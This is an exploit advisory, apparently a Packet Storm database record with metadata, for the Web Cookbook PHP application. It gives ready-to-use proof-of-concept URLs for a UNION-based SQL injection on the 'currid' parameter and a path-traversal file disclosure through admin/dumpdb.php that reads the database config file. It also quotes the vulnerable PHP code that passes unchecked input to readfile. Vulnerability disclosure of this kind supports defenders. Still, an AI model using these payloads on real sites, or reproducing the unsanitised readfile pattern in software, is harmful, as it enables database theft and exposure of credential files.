ID PACKETSTORM:120464
Type packetstorm
Reporter cr4wl3r
Modified 2013-02-21T00:00:00
Description
`# Web Cookbook Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# Script: http://sourceforge.net/projects/webcookbook/
# Tested: Win 7
# Proof of Concept
# SQL Injection
http://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]
http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--
# Remote File Disclosure
# Bugs found /admin/dumpdb.php
--------------------------
1 <?php
2 $outfile = $_GET['outfile'];
3 header("Content-Type: text/plain");
4 header("Content-length: " . filesize("../upload/" . $outfile));
5 header("Content-Disposition: attachment; filename=" . $outfile);
6 readfile("../upload/" . $outfile);
7 ?>
--------------------------
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php
# Demo:
http://bastardlabs.info/demo/WebCookbook1.png
http://bastardlabs.info/demo/WebCookbook2.png
`
{"hash": "8da0161125c950fe1fc8d8ddf48273d939d45545dab6fe0740d27bfd58a6b380", "sourceHref": "https://packetstormsecurity.com/files/download/120464/webcookbook-sqldisclose.txt", "title": "Web Cookbook File Disclosure / SQL Injection", "id": "PACKETSTORM:120464", "published": "2013-02-21T00:00:00", "description": "", "modified": "2013-02-21T00:00:00", "sourceData": "`# Web Cookbook Multiple Vulnerability \n# By cr4wl3r http://bastardlabs.info \n# Script: http://sourceforge.net/projects/webcookbook/ \n# Tested: Win 7 \n \n# Proof of Concept \n# SQL Injection \n \nhttp://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi] \nhttp://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10-- \n \n# Remote File Disclosure \n# Bugs found /admin/dumpdb.php \n \n-------------------------- \n1 <?php \n2 $outfile = $_GET['outfile']; \n3 header(\"Content-Type: text/plain\"); \n4 header(\"Content-length: \" . filesize(\"../upload/\" . $outfile)); \n5 header(\"Content-Disposition: attachment; filename=\" . $outfile); \n6 readfile(\"../upload/\" . $outfile); \n7 ?> \n-------------------------- \n \nhttp://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file] \nhttp://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php \n \n# Demo: \nhttp://bastardlabs.info/demo/WebCookbook1.png \nhttp://bastardlabs.info/demo/WebCookbook2.png \n`\n", "reporter": "cr4wl3r", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "6060381995f7991c894d0f8e7aecf948"}, {"key": "modified", "hash": "e778cd5ad0ef528858a7e170abbbc3c2"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "e778cd5ad0ef528858a7e170abbbc3c2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2334125181df3b2c18b2086aff8b0171"}, {"key": "sourceData", "hash": "3a27c452655fc195a8287c28ca3a4b46"}, {"key": "sourceHref", "hash": "43f23e132c22e4645b61f6db3c309969"}, {"key": "title", "hash": "24ec240809fc41c362e4769f228c6a81"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/120464/Web-Cookbook-File-Disclosure-SQL-Injection.html", "lastseen": "2016-11-03T10:20:42", "viewCount": 0, "enchantments": {"vulnersScore": 5.5}}
{"result": {}}